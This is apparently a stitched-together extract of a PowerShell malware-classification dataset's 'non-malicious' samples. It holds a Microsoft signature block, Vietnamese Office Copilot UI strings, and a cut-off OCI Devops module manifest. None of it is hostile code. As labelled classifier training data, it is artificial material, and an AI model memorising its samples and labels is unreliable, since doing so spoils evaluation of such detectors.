88ago7+SwAyQKsKNjww8ASing6zranWvJt+ZsixRpTARhpCxQF4SM0VRt8WOLGVT # +ycvrTcNDnlVNQtl4eLa22NAgtYNgLD/Oy5o1qRSI3RDR3hdZKGCF60wghepBgor # BgEEAYI3AwMBMYIXmTCCF5UGCSqGSIb3DQEHAqCCF4YwgheCAgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFaBgsqhkiG9w0BCRABBKCCAUkEggFFMIIBQQIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCCWGh4P/Rv1Iu9tqi6xRWcoB6OF5pGpsb9p # 0JAIbnvH7gIGZutwxlurGBMyMDI0MTAyODExMzcyMC44MTJaMASAAgH0oIHZpIHW # MIHTMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL # EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsT # Hm5TaGllbGQgVFNTIEVTTjo1NTFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9z # b2Z0IFRpbWUtU3RhbXAgU2VydmljZaCCEfswggcoMIIFEKADAgECAhMzAAACAdFF # WZgQzEJPAAEAAAIBMA0GCSqGSIb3DQEBCwUAMHwxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w # IFBDQSAyMDEwMB4XDTI0MDcyNTE4MzEyMloXDTI1MTAyMjE4MzEyMlowgdMxCzAJ # BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k # MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsTJE1pY3Jv # c29mdCBJcmVsYW5kIE9wZXJhdGlvbnMgTGltaXRlZDEnMCUGA1UECxMeblNoaWVs # ZCBUU1MgRVNOOjU1MUEtMDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGlt # ZS1TdGFtcCBTZXJ2aWNlMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA # tWrf+HzDu7sk50y5YHheCIJG0uxRSFFcHNek+Td9ZmyJj20EEjaU8JDJu5pWc4pP # AsBI38NEAJ1b+KBnlStqU8uvXF4qnEShDdi8nPsZZQsTZDKWAgUM2iZTOiWIuZcF # s5ZC8/+GlrVLM5h1Y9nfMh5B4DnUQOXMremAT9MkvUhg3uaYgmqLlmYyODmba4lX # ZBu104SLAFsXOfl/TLhpToT46y7lI9sbI9uq3/Aerh3aPi2knHvEEazilXeooXNL # Cwdu+Is6o8kQLouUn3KwUQm0b7aUtsv1X/OgPmsOJi6yN3LYWyHISvrNuIrJ4iYN # gHdBBumQYK8LjZmQaTKFacxhmXJ0q2gzaIfxF2yIwM+V9sQqkHkg/Q+iSDNpMr6m # r/OwknOEIjI0g6ZMOymivpChzDNoPz9hkK3gVHZKW7NV8+UBXN4G0aBX69fKUbxB # BLyk2cC+PhOoUjkl6UC8/c0huqj5xX8m+YVIk81e7t6I+V/E4yXReeZgr0FhYqNp # vTjGcaO2WrkP5XmsYS7IvMPIf4DCyIJUZaqoBMToAJJHGRe+DPqCHg6bmGPm97Mr # OWv16/Co6S9cQDkXp9vMSSRQWXy4KtJhZfmuDz2vr1jw4NeixwuIDGw1mtV/TdSI # +vpLJfUiLl/b9w/tJB92BALQT8e1YH8NphdOo1xCwkcCAwEAAaOCAUkwggFFMB0G # A1UdDgQWBBSwcq9blqLoPPiVrym9mFmFWbyyUjAfBgNVHSMEGDAWgBSfpxVdAF5i # XYP05dJlpxtTNRnpcjBfBgNVHR8EWDBWMFSgUqBQhk5odHRwOi8vd3d3Lm1pY3Jv # c29mdC5jb20vcGtpb3BzL2NybC9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENB # JTIwMjAxMCgxKS5jcmwwbAYIKwYBBQUHAQEEYDBeMFwGCCsGAQUFBzAChlBodHRw # Oi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NlcnRzL01pY3Jvc29mdCUyMFRp # bWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNydDAMBgNVHRMBAf8EAjAAMBYGA1Ud # JQEB/wQMMAoGCCsGAQUFBwMIMA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG9w0BAQsF # AAOCAgEAOjQAyz0cVztTFGqXX5JLRxFK/O/oMe55uDqEC8Vd1gbcM28KBUPgvUIP # Xm/vdDN2IVBkWHmwCp4AIcy4dZtkuUmd0fnu6aT9Mvo1ndsLp2YJcMoFLEt3Ttri # LaO+i4Grv0ZULtWXUPAW/Mn5Scjgn0xZduGPBD/Xs3J7+get9+8ZvBipsg/N7poi # mYOVsHxLcem7V5XdMNsytTm/uComhM/wgR5KlDYTVNAXBxcSKMeJaiD3V1+HhNkV # liMl5VOP+nw5xWF55u9h6eF2G7eBPqT+qSFQ+rQCQdIrN0yG1QN9PJroguK+FJQJ # dQzdfD3RWVsciBygbYaZlT1cGJI1IyQ74DQ0UBdTpfeGsyrEQ9PI8QyqVLqb2q7L # tI6DJMNphYu+jr//0spr1UVvyDPtuRnbGQRNi1COwJcj9OYmlkFgKNeCfbDT7U3u # EOvWomekX60Y/m5utRcUPVeAPdhkB+DxDaev3J1ywDNdyu911nAVPgRkyKgMK3US # LG37EdlatDk8FyuCrx4tiHyqHO3wE6xPw32Q8e/vmuQPoBZuX3qUeoFIsyZEenHq # 2ScMunhcqW32SUVAi5oZ4Z3nf7dAgNau21NEPwgW+2wkrNqDg7Hp8yHyoOKbgEBu # 6REQbvSfZ5Kh4PV+S2gxf2uq6GoYDnlqABOMYwz309ISi0bPMh8wggdxMIIFWaAD # AgECAhMzAAAAFcXna54Cm0mZAAAAAAAVMA0GCSqGSIb3DQEBCwUAMIGIMQswCQYD # VQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEe # MBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMTIwMAYDVQQDEylNaWNyb3Nv # ZnQgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkgMjAxMDAeFw0yMTA5MzAxODIy # MjVaFw0zMDA5MzAxODMyMjVaMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo # aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y # cG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEw # MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA5OGmTOe0ciELeaLL1yR5 # vQ7VgtP97pwHB9KpbE51yMo1V/YBf2xK4OK9uT4XYDP/XE/HZveVU3Fa4n5KWv64 # NmeFRiMMtY0Tz3cywBAY6GB9alKDRLemjkZrBxTzxXb1hlDcwUTIcVxRMTegCjhu # je3XD9gmU3w5YQJ6xKr9cmmvHaus9ja+NSZk2pg7uhp7M62AW36MEBydUv626GIl # 3GoPz130/o5Tz9bshVZN7928jaTjkY+yOSxRnOlwaQ3KNi1wjjHINSi947SHJMPg # yY9+tVSP3PoFVZhtaDuaRr3tpK56KTesy+uDRedGbsoy1cCGMFxPLOJiss254o2I # 5JasAUq7vnGpF1tnYN74kpEeHT39IM9zfUGaRnXNxF803RKJ1v2lIH1+/NmeRd+2 # ci/bfV+AutuqfjbsNkz2K26oElHovwUDo9Fzpk03dJQcNIIP8BDyt0cY7afomXw/ # TNuvXsLz1dhzPUNOwTM5TI4CvEJoLhDqhFFG4tG9ahhaYQFzymeiXtcodgLiMxhy # 16cg8ML6EgrXY28MyTZki1ugpoMhXV8wdJGUlNi5UPkLiWHzNgY1GIRH29wb0f2y # 1BzFa/ZcUlFdEtsluq9QBXpsxREdcu+N+VLEhReTwDwV2xo3xwgVGD94q0W29R6H # XtqPnhZyacaue7e3PmriLq0CAwEAAaOCAd0wggHZMBIGCSsGAQQBgjcVAQQFAgMB # AAEwIwYJKwYBBAGCNxUCBBYEFCqnUv5kxJq+gpE8RjUpzxD/LwTuMB0GA1UdDgQW # BBSfpxVdAF5iXYP05dJlpxtTNRnpcjBcBgNVHSAEVTBTMFEGDCsGAQQBgjdMg30B # ATBBMD8GCCsGAQUFBwIBFjNodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3Bz # L0RvY3MvUmVwb3NpdG9yeS5odG0wEwYDVR0lBAwwCgYIKwYBBQUHAwgwGQYJKwYB # BAGCNxQCBAweCgBTAHUAYgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB/wQFMAMB # Af8wHwYDVR0jBBgwFoAU1fZWy4/oolxiaNE9lJBb186aGMQwVgYDVR0fBE8wTTBL # oEmgR4ZFaHR0cDovL2NybC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVjdHMv # TWljUm9vQ2VyQXV0XzIwMTAtMDYtMjMuY3JsMFoGCCsGAQUFBwEBBE4wTDBKBggr # BgEFBQcwAoY+aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNS # b29DZXJBdXRfMjAxMC0wNi0yMy5jcnQwDQYJKoZIhvcNAQELBQADggIBAJ1Vffwq # reEsH2cBMSRb4Z5yS/ypb+pcFLY+TkdkeLEGk5c9MTO1OdfCcTY/2mRsfNB1OW27 # DzHkwo/7bNGhlBgi7ulmZzpTTd2YurYeeNg2LpypglYAA7AFvonoaeC6Ce5732pv # vinLbtg/SHUB2RjebYIM9W0jVOR4U3UkV7ndn/OOPcbzaN9l9qRWqveVtihVJ9Ak # vUCgvxm2EhIRXT0n4ECWOKz3+SmJw7wXsFSFQrP8DJ6LGYnn8AtqgcKBGUIZUnWK # NsIdw2FzLixre24/LAl4FOmRsqlb30mjdAy87JGA0j3mSj5mO0+7hvoyGtmW9I/2 # kQH2zsZ0/fZMcm8Qq3UwxTSwethQ/gpY3UA8x1RtnWN0SCyxTkctwRQEcb9k+SS+ # c23Kjgm9swFXSVRk2XPXfx5bRAGOWhmRaw2fpCjcZxkoJLo4S5pu+yFUa2pFEUep # 8beuyOiJXk+d0tBMdrVXVAmxaQFEfnyhYWxz/gq77EFmPWn9y8FBSX5+k77L+Dvk # txW/tM4+pTFRhLy/AsGConsXHRWJjXD+57XQKBqJC4822rpM+Zv/Cuk0+CQ1Zyvg # DbjmjJnW4SLq8CdCPSWU5nR0W2rRnj7tfqAxM328y+l7vzhwRNGQ8cirOoo6CGJ/ # 2XBjU02N7oJtpQUQwXEGahC0HVUzWLOhcGbyoYIDVjCCAj4CAQEwggEBoYHZpIHW # MIHTMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL # EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsT # Hm5TaGllbGQgVFNTIEVTTjo1NTFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9z # b2Z0IFRpbWUtU3RhbXAgU2VydmljZaIjCgEBMAcGBSsOAwIaAxUA1+26cR/yH100 # DiNFGWhuAv2rYBqggYMwgYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx # MDANBgkqhkiG9w0BAQsFAAIFAOrJVyEwIhgPMjAyNDEwMjgwMDE5NDVaGA8yMDI0 # MTAyOTAwMTk0NVowdDA6BgorBgEEAYRZCgQBMSwwKjAKAgUA6slXIQIBADAHAgEA # AgIBszAHAgEAAgITSjAKAgUA6sqooQIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgor # BgEEAYRZCgMCoAowCAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBCwUA # A4IBAQABMN9oWsdpzGRztiY54MmqGWUVyuXmaxbDA6z8iE8obpRv+lydBHDEzF+b # zjdtPSXWUAH0/FMRRhX0teLdCIIacsSa/2bH70CbOdzWv6Q+8mYD34Mes4H/MfoC # K+NcUU2sDPmN4LqO/2eyh0kKM3DzfJuIidm6cvD2YA69CSh85IuoBwIJD3zHB1ga # wgzN2hPCeSdXzXZoMevJN33/MSsU3gjjZk0RGc4Xol2tzHMD3/GkJdRTW7K5OP46 # vX9QfJzbfGiC4yGAPtbIY98+0m5sKTxGYHp9nxOyMAa+aGUH5MqAgXkBYGlW86uW # YdQl/cvicZdjgMRYNUklFP/zfxppMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTACEzMAAAIB0UVZmBDMQk8AAQAAAgEwDQYJYIZIAWUD # BAIBBQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0B # CQQxIgQghvctgGIJHoazCU/LeJhZ+uexznli1PUlbKwjSwAD/NQwgfoGCyqGSIb3 # DQEJEAIvMYHqMIHnMIHkMIG9BCBYa7I6TJQRcmx0HaSTWZdJgowdrl9+Zrr0pIdq # Htc4IzCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9u # MRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp # b24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAC # AdFFWZgQzEJPAAEAAAIBMCIEIKMcBulW2TKoXBfoaBGu0S2w65GKyV6YpORLn7xf # HyoaMA0GCSqGSIb3DQEBCwUABIICAIdZC7yNE32Daw7Sna+otV1SQi/TcMLAzm5z # JeZcx2aUh8kRn2rHc+U97le6PIAHAriJzw1p3KCEgtWduCIaVINFMXC9og93D4c+ # Klp17xSKgh/aOskPgQc4MRxpi4bpUHIyIUM+w9ZNZwZZZLJpbr2hsWiIPaQcEf+O # FHjnlur2X/L+S/P8lHLtwuCOpQpDy2aQIgQzo+xUP429nuXOIl1xHts+G5k4r2NU # QX+961/5i8tuEYtW1Z/eRlzHQlZ3F2pFTQ487pfsm8Wx95IcF19TdrvqL3tEEa3K # fmAC/WJfYhdWQH8/Z0fuuUkfMtmXweozme2fbOKoUfc06s5QKt9IvQDOgoFRKLeH # OOD9b5XcRtIbDXn+XJ9O4cPG16oZ1vDUWqmxddBT5F5qxUvqRhfjjE/SP68FAyxM # c8atLNW/NfHL7YSY/fCFlleEwze4jU9hJqaUPcA0TTsHLmRbaXlR/YMNX8O6Innz # +wclepB3AlSSBQ2kLuMKsD9HV2d/su486ldX9rK+3zCLQH2Eal27cODrwYedDVvF # qVvpNgrZXnUq+b63TbGcSqyr/hVSssQxc0IHgQaaltcXlbQlK0FiHr9MmQDD9p5a # 6d4sNQETnZe2ru57frqZSwPy4w8uuFb+/XG2Yd+Nx7/3Hpzfeuc1C1Fi54T4wsts # IEpGSzH+ # SIG # End signature block
combined_dataset/train/non-malicious/sample_29_18.ps1
sample_29_18.ps1
var OfficeaicopilotStrings={ChatContainerKeepItActionButtonText:"Giữ lại",ChatContainerUndoActionButtonText:"Hoàn tác",ChatContainerInsertActionButtonText:"Chèn",ChatContainerFeedbackNudgeContent:"Vui lòng giúp chúng tôi tìm hiểu và đào tạo các mô hình của mình bằng cách cung cấp phản hồi thông qua các nút điều khiển thích và không thích đối với mỗi đầu ra mà LLM tạo ra.",ChatContainerFeedbackNudgeContentTitle:"Nội dung nhắc phản hồi",ChatContainerFeedbackNudgeHeader:"Cung cấp phản hồi",ChatContainerFeedbackNudgeHeaderTitle:"CHỈ DÀNH CHO NỘI BỘ MICROSOFT",ChatCardFooterDisclaimer:"Nội dung do AI tạo có thể không chính xác.",AIGenerated:"AI được tạo ra",ChatInputDefaultPlaceholder:"Chọn lời nhắc bắt đầu hoặc nhập lời nhắc của riêng bạn",FREHeaderText:"Copilot sẵn sàng trợ giúp",FREButtonText:"Bắt đầu",StarterPromptMenuItemDefaultPrefix:"Menu Hướng dẫn Nhắc nhở",ShowMeButtonText:"Chỉ dẫn cho tôi",HelpButtonText:"Trợ giúp",ShowMeChatMessage:'Hiện tại, tôi không thể đưa thông tin đó vào cuộc trò chuyện của chúng ta nhưng bạn có thể tìm thấy tính năng "$1(commandName)" trong tab $2(tabName) của dải băng',ShowMeUpdatedMessage:'Bạn có thể tìm thấy tính năng "$1(commandName)" trên tab $2(tabName) của dải băng nhưng tôi không thể truy nhập trực tiếp tính năng này. Bạn có muốn tôi chỉ cho bạn vị trí của tính năng không?',ShowMeErrorMessage:"Rất tiếc, tôi không biết cách thực hiện điều đó. Hãy thử diễn đạt lại yêu cầu của bạn hoặc hỏi tôi về một tính năng khác.",ShowMeUpdatedMessageWithoutAction:'Bạn có thể tìm thấy tính năng "$1(commandName)" trên tab $2(tabName) của dải băng, nhưng tôi không thể truy nhập trực tiếp vào nó.',ChatContainerTitle:"Bộ chứa trò chuyện",ChatContainerDefaultMessageTitle:"Tin nhắn trò chuyện mặc định",ChatContainerListEmbeddedMessageTitle:"Liệt kê tin nhắn trò chuyện được nhúng",ChatContainerLinkEmbeddedMessageTitle:"Liên kết tin nhắn trò chuyện được nhúng",ChatInputTitle:"Khu vực lời nhắc",StarterPromptMenuTitle:"Hướng dẫn về lời nhắc",SubmitButtonTitle:"Gửi",FREHeaderTextLabel:"freSharedHeaderText",FREDescriptionTextLabel:"freSharedDescription",HintCardHeaderTextLabel:"hintCardHeaderText",HintCardDescriptionTextLabel:"hintCardDescriptionText",LoadingUiTextLabel:"loadingUiText",ZQMHeaderTextLabel:"zqmHeaderText",ChatMessagesLabel:"Tin nhắn Trò chuyện",RegenerateButtonLabel:"Tạo lại",CopyButtonLabel:"Sao chép",LikeButtonLabel:"Thích",DislikeButtonLabel:"Không thích",SuggestionPaneLabel:"Lời nhắc được gợi ý",SuggestionPaneRefreshButtonLabel:"Làm mới",StopGeneratingButtonLabel:"Dừng tạo",InputToolTipSuggestion:"Thêm các chi tiết như độ dài, âm điệu và kiểu để hoàn tất lời nhắc",MicrophonPermissionErrorTitle:"Không có quyền micrô",MicrophonPermissionErrorText:"Copilot không thể truy cập micrô của bạn. Bấm vào biểu tượng khóa trong thanh địa chỉ trình duyệt ở trên, đặt quyền của bạn để cho phép truy nhập vào micrô, rồi thử lại.",NeedHelpLink:"Bạn cần trợ giúp?",NotNowMicrophoneButton:"Để sau",TryAgainMicrophoneButton:"Thử lại",MicrophoneTooltip:"Micrô",MicrophonPermissionErrorTitleWin32:"Rất tiếc, không thể ghi lại âm thanh của bạn",MicrophonPermissionErrorTextWin32:"Đã xảy ra sự cố với micrô của bạn. Vui lòng kiểm tra cài đặt quyền micrô của bạn.",MicrophonePausedStatus:"Micrô đã tạm dừng",MicrophoneListeningStatus:"Đang nghe Micrô",MicrophoneDisabledStatus:"Đã tắt Micrô",MicrophoneLoadingStatus:"Đang tải Micrô",ImagePickerHeader:"Sau đây là {0} khả năng...",ImagePickerInsert:"Đã thêm một hình ảnh.",DesignerDialogHeader:"Designer",CopilotPromptLibraryHeader:"Copilot Lab",CopilotLabLaunchertext:"Đi đến Copilot Lab",CopilotLabMenuSubItem:"Xem các lời nhắc khác",PromptGuideMenuSectionHeader:"Ví dụ để giúp bạn %s",CitationTitleReference:"Tài liệu tham khảo",CitationTitleReferences:"Tài liệu tham khảo",DefaultCIQButtonTitle:"Đính kèm",DefaultGroundingButtonTitle:"Quản lý tìm kiếm và phần bổ trợ",DefaultMenuButtonTitle:"Xem lời nhắc",DefaultGhostText:"Hãy đặt câu hỏi hoặc cho tôi biết bạn muốn làm gì. Để có ý tưởng về cách tôi có thể trợ giúp, hãy chọn hướng dẫn nhắc nhở.",ErrorOffensiveInputContent:"Rất tiếc, tôi không thể xử lý nội dung đó. Hãy thử tạo yêu cầu mới",ErrorOffensiveOutputContent:"Rất tiếc tôi không thể tạo nội dung cho yêu cầu này. Hãy thử đưa ra yêu cầu mới.",ErrorInputBlockedByDynamicGuardList:"Có vẻ như có một số nội dung ở đây mà tôi không thể xử lý được. Hãy thử yêu cầu tôi làm điều gì đó khác.",ErrorInvalidSignal:"Đã xảy ra lỗi. Vui lòng thử lại sau giây lát.",ErrorTimeout:"Tôi không thể xử lý yêu cầu của bạn ngay bây giờ. Hãy thử lại sau một lát. ",ErrorThrottled:"Đã đạt đến số lượng yêu cầu tối đa mỗi giờ. Hãy thử lại sau giây lát.",ErrorUserThrottled:"Bạn chỉ được phép có một số lượng yêu cầu nhất định mỗi giây. Hãy thử lại sau một lát.",ErrorInputTooLong:"Đây là quá nhiều thông tin để tôi có thể xử lý. Hãy thử lại với yêu cầu ít hơn 15.000 từ.",ErrorInvalidLanguage:"Yêu cầu của bạn bao gồm ngôn ngữ mà tôi hiện không hỗ trợ.",ChatHistoryHydrationError:"Nếu đây là hoạt động tiếp tục của cuộc trò chuyện trước đó và bạn muốn sử dụng lịch sử trò chuyện, hãy thử đóng và mở lại ngăn.",DisengagedError:"Tôi không thể làm việc với nội dung này. Bấm vào Thay đổi Chủ đề để đặt câu hỏi khác.",LearnMoreString:"Tìm hiểu thêm",CopyButtonPopover:"Đã sao chép vào bảng tạm",MicrophoneListeningGhostText:"Đang lắng nghe...",ChangeTopicButtonLabel:"Thay đổi chủ đề",WorkingOnItString:"Đang thực hiện...",TopicChangedResponseText:"Ok, hãy thay đổi chủ đề. Bạn muốn nói về điều gì?",DKEAndNotExtractLabelErrorString:"Copilot không thể tham chiếu nội dung này vì chính sách của tổ chức bạn không cho phép điều đó.",BlockingCookiesErrorMessage:"Cài đặt trình duyệt của bạn đang chặn các cookie được yêu cầu cho Copilot. Vui lòng sử dụng trình duyệt thay thế hoặc Ứng dụng dành cho máy tính để bàn.",LicenseValidationErrorMessage:"Chúng tôi đã gặp sự cố khi xác thực giấy phép Copilot của bạn. Để biết thêm thông tin, hãy xem https://aka.ms/copilotlicensecheck",DesignerPreviewLabel:"Bản xem trước trình thiết kế",CseSelfHelpSkillContentRetrievedMultipleArticles:"Đây là nội dung tôi đã tìm thấy:",CseSelfHelpSkillContentRetrievedQuickAnswer:"Đây là nội dung tôi đã tìm thấy:",CseSelfHelpSkillContentRetrievedSingleArticle:"Đây là nội dung tôi đã tìm thấy:",CseSelfHelpSkillErrorOrNoContentRetrieved:"Rất tiếc, tôi gặp sự cố khi tìm thông tin về nội dung đó. Vui lòng diễn đạt lại yêu cầu của bạn, rồi thử lại.",CseSelfHelpSkillLaunchHelpPaneTextArticle:"Xem bài viết",LoadingUIStringFinishingUp:"Đang hoàn tất...",LoadingUIStringGettingReady:"Đang chuẩn bị sẵn sàng...",LoadingUIStringGettingEverythingReady:"Đang chuẩn bị sẵn sàng mọi thứ...",LoadingUIStringCraftingContent:"Đang tạo nội dung của bạn...",LoadingUIStringFinishingTouches:"Đang áp dụng các bước hoàn thiện cuối cùng...",LoadingUIStringWorkingOnRequest:"Đang làm việc theo yêu cầu của bạn...",LoadingUIStringGatheringResources:"Đang thu thập tài nguyên...",PaneLoadingUIString:"Vui lòng chờ pa nen hoàn tất quá trình tải",GroundingSearchAndPlugins:"Tìm kiếm và plugin",GroundingPluginFlyoutInfoTooltip:"Dữ liệu Microsoft 365 Enterprise bao gồm các ứng dụng Office, trang web SharePoint, tệp trên đám mây, thông tin liên lạc và nhiều nội dung khác. Tất cả đều được người quản trị CNTT của bạn cấu hình.",GroundingPluginFlyoutInfo:"Phần bổ trợ cho phép Copilot thay mặt bạn tham khảo các ứng dụng. Copilot có thể chia sẻ một số dữ liệu doanh nghiệp Microsoft 365 của bạn với các plugin bạn đã bật.",PreviewFlagLabel:"Bản xem trước",AdminBlockedPluginInfoTooltipLabel:"Dịch vụ cần thiết để sử dụng bổ trợ này đã bị tắt cho tổ chức của bạn.",WorkPluginLabel:"Dữ liệu Microsoft 365",WebContentPluginLabel:"Nội dung web",CIQDefaultPlaceholder:"Bắt đầu nhập để tìm kiếm",ProactiveSuggestionTitleText:"Tô sáng dữ liệu",ProactiveSuggestionIconText:"Ý tưởng",ProactiveSuggestionBodyText:"Để có bản trình bày hấp dẫn hơn, đây là thiết kế có thể tô sáng tốt hơn số liệu thống kê trong trang chiếu của bạn.",ProactiveSuggestionApplyBtnText:"Áp dụng",ProactiveSuggestionImageAltText:"img thẻ đề xuất chủ động"};
combined_dataset/train/non-malicious/sample_58_4.ps1
sample_58_4.ps1
# # Module manifest for module 'OCI.PSModules.Devops' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Devops.dll' # Version number of this module. ModuleVersion = '85.2.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = '0d3ad8c4-0bd3-4b6f-9da3-3085294e7733' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Devops Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '85.2.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Devops.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Confirm-OCIDevopsConnection', 'Get-OCIDevopsAuthorsList', 'Get-OCIDevopsBuildPipeline', 'Get-OCIDevopsBuildPipelinesList', 'Get-OCIDevopsBuildPipelineStage', 'Get-OCIDevopsBuildPipelineStagesList', 'Get-OCIDevopsBuildRun', 'Get-OCIDevopsBuildRunsList', 'Get-OCIDevopsCommit', 'Get-OCIDevopsCommitDiff', 'Get-OCIDevopsCommitDiffsList', 'Get-OCIDevopsCommitsList', 'Get-OCIDevopsConnection', 'Get-OCIDevopsConnectionsList', 'Get-OCIDevopsDeployArtifact', 'Get-OCIDevopsDeployArtifactsList', 'Get-OCIDevopsDeployEnvironment', 'Get-OCIDevopsDeployEnvironmentsList', 'Get-OCIDevopsDeployment', 'Get-OCIDevopsDeploymentsList', 'Get-OCIDevopsDeployPipeline', 'Get-OCIDevopsDeployPipelinesList', 'Get-OCIDevopsDeployStage', 'Get-OCIDevopsDeployStagesList', 'Get-OCIDevopsFileDiff', 'Get-OCIDevopsMirrorRecord', 'Get-OCIDevopsMirrorRecordsList', 'Get-OCIDevopsObject', 'Get-OCIDevopsObjectContent', 'Get-OCIDevopsPathsList', 'Get-OCIDevopsProject', 'Get-OCIDevopsProjectsList', 'Get-OCIDevopsRef', 'Get-OCIDevopsRefsList', 'Get-OCIDevopsRepoFileDiff', 'Get-OCIDevopsRepoFileLines', 'Get-OCIDevopsRepositoriesList', 'Get-OCIDevopsRepository', 'Get-OCIDevopsRepositoryArchiveContent', 'Get-OCIDevopsRepositoryFileLines', 'Get-OCIDevopsTrigger', 'Get-OCIDevopsTriggersList', 'Get-OCIDevopsWorkRequest', 'Get-OCIDevopsWorkRequestErrorsList', 'Get-OCIDevopsWorkRequestLogsList', 'Get-OCIDevopsWorkRequestsList', 'Invoke-OCIDevopsApproveDeployment', 'Invoke-OCIDevopsMirrorRepository', 'Invoke-OCIDevopsScheduleCascadingProjectDeletion', 'Move-OCIDevopsProjectCompartment', 'New-OCIDevopsBuildPipeline', 'New-OCIDevopsBuildPipelineStage', 'New-OCIDevopsBuildRun', 'New-OCIDevopsConnection', 'New-OCIDevopsDeployArtifact', 'New-OCIDevopsDeployEnvironment', 'New-OCIDevopsDeployment', 'New-OCIDevopsDeployPipeline', 'New-OCIDevopsDeployStage', 'New-OCIDevopsProject', 'New-OCIDevopsRepository', 